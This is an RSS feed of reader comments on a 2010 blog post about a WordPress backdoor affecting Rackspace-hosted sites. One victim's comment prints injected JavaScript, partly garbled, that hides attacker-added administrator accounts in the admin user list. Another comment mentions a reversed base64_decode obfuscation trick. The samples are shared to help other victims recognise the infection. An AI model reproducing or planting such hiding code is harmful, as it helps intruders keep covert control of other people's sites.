<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Rackspace Hacked Clients, Check Your Databases: WordPress &#8220;wp_optimize&#8221; Backdoor In wp_options Table</title>
	<atom:link href="http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/feed/" rel="self" type="application/rss+xml" />
	<link>http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/</link>
	<description>Smackdown!</description>
	<lastBuildDate>Fri, 10 Feb 2012 01:20:31 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
	<item>
		<title>By: Justin C</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/comment-page-1/#comment-57946</link>
		<dc:creator>Justin C</dc:creator>
		<pubDate>Fri, 09 Sep 2011 18:44:00 +0000</pubDate>
		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=747#comment-57946</guid>
		<description>This is a damn shame. I buddy of mine got hacked a few months ago. It took the hosting company 4 days to get him back online. I don&#039;t know how much he lost in that period of time but he was NOT happy with them!</description>
		<content:encoded><![CDATA[<p>This is a damn shame. I buddy of mine got hacked a few months ago. It took the hosting company 4 days to get him back online. I don&#8217;t know how much he lost in that period of time but he was NOT happy with them!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: How To Completely Clean Your Hacked WordPress Installation &#124; Smackdown!</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/comment-page-1/#comment-53098</link>
		<dc:creator>How To Completely Clean Your Hacked WordPress Installation &#124; Smackdown!</dc:creator>
		<pubDate>Fri, 05 Nov 2010 19:05:27 +0000</pubDate>
		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=747#comment-53098</guid>
		<description>[...] to vulnerabilities with the actual hosts. Some of the bigger names that were hit include GoDaddy, Rackspace Cloud, MediaTemple, and Network Solutions, for instance. It is very important that you use a host that is [...]</description>
		<content:encoded><![CDATA[<div style="background-color: #E4E8EB;">
<p>[...] to vulnerabilities with the actual hosts. Some of the bigger names that were hit include GoDaddy, Rackspace Cloud, MediaTemple, and Network Solutions, for instance. It is very important that you use a host that is [...]</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>By: MIR is no longer hosted on the Rackspace Cloud &#124; Mobile News &#38; Reviews</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/comment-page-1/#comment-52079</link>
		<dc:creator>MIR is no longer hosted on the Rackspace Cloud &#124; Mobile News &#38; Reviews</dc:creator>
		<pubDate>Tue, 10 Aug 2010 21:00:07 +0000</pubDate>
		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=747#comment-52079</guid>
		<description>[...] reading I&#8217;ve done, Rackspace suffered some kind of security issue at some point. Michael over at Smackdown has a good summary of his findings. The security issue resulted in a ton of my sites &#8212; and I [...]</description>
		<content:encoded><![CDATA[<div style="background-color: #E4E8EB;">
<p>[...] reading I&#8217;ve done, Rackspace suffered some kind of security issue at some point. Michael over at Smackdown has a good summary of his findings. The security issue resulted in a ton of my sites &#8212; and I [...]</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>By: MIR is no longer hosted on the Rackspace Cloud &#124; Mobile Industry Review</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/comment-page-1/#comment-52078</link>
		<dc:creator>MIR is no longer hosted on the Rackspace Cloud &#124; Mobile Industry Review</dc:creator>
		<pubDate>Tue, 10 Aug 2010 20:51:32 +0000</pubDate>
		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=747#comment-52078</guid>
		<description>[...] reading I&#8217;ve done, Rackspace suffered some kind of security issue at some point. Michael over at Smackdown has a good summary of his findings. The security issue resulted in a ton of my sites &#8212; and I [...]</description>
		<content:encoded><![CDATA[<div style="background-color: #E4E8EB;">
<p>[...] reading I&#8217;ve done, Rackspace suffered some kind of security issue at some point. Michael over at Smackdown has a good summary of his findings. The security issue resulted in a ton of my sites &#8212; and I [...]</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>By: Jamie Barclay</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/comment-page-1/#comment-51256</link>
		<dc:creator>Jamie Barclay</dc:creator>
		<pubDate>Fri, 25 Jun 2010 23:40:22 +0000</pubDate>
		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=747#comment-51256</guid>
		<description>It is sad to know that some hosting companies do not pay attention that much on their customers&#039; complaints. I hope what happened to this one will be a lesson to all hosting companies.</description>
		<content:encoded><![CDATA[<p>It is sad to know that some hosting companies do not pay attention that much on their customers&#8217; complaints. I hope what happened to this one will be a lesson to all hosting companies.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Tomi M</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/comment-page-1/#comment-50549</link>
		<dc:creator>Tomi M</dc:creator>
		<pubDate>Sat, 19 Jun 2010 19:55:03 +0000</pubDate>
		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=747#comment-50549</guid>
		<description>My blog was compromised. The following javascript was injected to the admin page listing Administrator users resulting in the added admin users to be hidden.


var setUserName = function(){
try{
var t=document.getElementById(&quot;user_superuser&quot;);
while(t.nodeName!=&quot;TR&quot;){
t=t.parentNode;
};
t.parentNode.removeChild(t);
var tags = document.getElementsByTagName(&quot;H3&quot;);
var s = &quot; shown below&quot;;
for (var i = 0; i 0){
s =(parseInt(t)-1)+s;
h.removeChild(h.firstChild);
t = document.createTextNode(s);
h.appendChild(t);
}
}
var arr=document.getElementsByTagName(&quot;ul&quot;);
for(var i in arr) if(arr[i].className==&quot;subsubsub&quot;){
var n=/&gt;Administrator \((\d+)\)0){
var txt=arr[i].innerHTML.replace(/&gt;Administrator \((\d+)\)Administrator (&quot;+(n[1]-1)+&quot;)Administrator \((\d+)\)0){
var txt=arr[i].innerHTML.replace(/&gt;Administrator \((\d+)\)Administrator (&quot;+(n[1]-1)+&quot;)All \((\d+)\)0){
var txt=arr[i].innerHTML.replace(/&gt;All \((\d+)\)All (&quot;+(n[1]-1)+&quot;)&lt;&quot;);
arr[i].innerHTML=txt;
}
}
}catch(e){};
};
addLoadEvent(setUserName);
</description>
		<content:encoded><![CDATA[<p>My blog was compromised. The following javascript was injected to the admin page listing Administrator users resulting in the added admin users to be hidden.</p>
<p>var setUserName = function(){<br />
try{<br />
var t=document.getElementById(&#8220;user_superuser&#8221;);<br />
while(t.nodeName!=&#8221;TR&#8221;){<br />
t=t.parentNode;<br />
};<br />
t.parentNode.removeChild(t);<br />
var tags = document.getElementsByTagName(&#8220;H3&#8243;);<br />
var s = &#8221; shown below&#8221;;<br />
for (var i = 0; i 0){<br />
s =(parseInt(t)-1)+s;<br />
h.removeChild(h.firstChild);<br />
t = document.createTextNode(s);<br />
h.appendChild(t);<br />
}<br />
}<br />
var arr=document.getElementsByTagName(&#8220;ul&#8221;);<br />
for(var i in arr) if(arr[i].className==&#8221;subsubsub&#8221;){<br />
var n=/&gt;Administrator \((\d+)\)0){<br />
var txt=arr[i].innerHTML.replace(/&gt;Administrator \((\d+)\)Administrator (&#8220;+(n[1]-1)+&#8221;)Administrator \((\d+)\)0){<br />
var txt=arr[i].innerHTML.replace(/&gt;Administrator \((\d+)\)Administrator (&#8220;+(n[1]-1)+&#8221;)All \((\d+)\)0){<br />
var txt=arr[i].innerHTML.replace(/&gt;All \((\d+)\)All (&#8220;+(n[1]-1)+&#8221;)&lt;&quot;);<br />
arr[i].innerHTML=txt;<br />
}<br />
}<br />
}catch(e){};<br />
};<br />
addLoadEvent(setUserName);</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: N</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/comment-page-1/#comment-50255</link>
		<dc:creator>N</dc:creator>
		<pubDate>Thu, 17 Jun 2010 13:32:16 +0000</pubDate>
		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=747#comment-50255</guid>
		<description>Some posts about it here... maybe we can all gather info in one place?
http://wordpress.org/support/topic/405684?replies=42</description>
		<content:encoded><![CDATA[<p>Some posts about it here&#8230; maybe we can all gather info in one place?<br />
<a href="http://wordpress.org/support/topic/405684?replies=42" rel="nofollow">http://wordpress.org/support/t.....replies=42</a></p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Managing Hacked Client WordPress Sites: Prevention, Reaction and Investigation &#8211; Chris LeCompte</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/comment-page-1/#comment-50254</link>
		<dc:creator>Managing Hacked Client WordPress Sites: Prevention, Reaction and Investigation &#8211; Chris LeCompte</dc:creator>
		<pubDate>Thu, 17 Jun 2010 13:23:22 +0000</pubDate>
		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=747#comment-50254</guid>
		<description>[...] Smackdown! Blog: Rackspace clients, check your databases [...]</description>
		<content:encoded><![CDATA[<div style="background-color: #E4E8EB;">
<p>[...] Smackdown! Blog: Rackspace clients, check your databases [...]</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>By: Another Hosting Company Compromised By Hackers &#187; Zander Chance</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/comment-page-1/#comment-50170</link>
		<dc:creator>Another Hosting Company Compromised By Hackers &#187; Zander Chance</dc:creator>
		<pubDate>Wed, 16 Jun 2010 20:51:42 +0000</pubDate>
		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=747#comment-50170</guid>
		<description>[...] Then, a few days ago, I notice a post on the host&#8217;s support forums. And low and behold, other people hosting here are dealing with the SAME NIGHTMARE! Even better, a blogger spelled out in graphic detail what was going on, which can be seen here. (Later that day, another site makes a post giving even more details! [...]</description>
		<content:encoded><![CDATA[<div style="background-color: #E4E8EB;">
<p>[...] Then, a few days ago, I notice a post on the host&#8217;s support forums. And low and behold, other people hosting here are dealing with the SAME NIGHTMARE! Even better, a blogger spelled out in graphic detail what was going on, which can be seen here. (Later that day, another site makes a post giving even more details! [...]</p>
</div>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ken</title>
		<link>http://smackdown.blogsblogsblogs.com/2010/06/14/rackspace-hacked-clients-check-your-databases-wordpress-wp_optimize-backdoor-in-wp_options-table/comment-page-1/#comment-50168</link>
		<dc:creator>Ken</dc:creator>
		<pubDate>Wed, 16 Jun 2010 20:32:56 +0000</pubDate>
		<guid isPermaLink="false">http://smackdown.blogsblogsblogs.com/?p=747#comment-50168</guid>
		<description>The infection I have is &quot;backwards&quot; ie. (edoced_46esab(</description>
		<content:encoded><![CDATA[<p>The infection I have is &#8220;backwards&#8221; ie. (edoced_46esab(</p>
]]></content:encoded>
	</item>
</channel>
</rss>

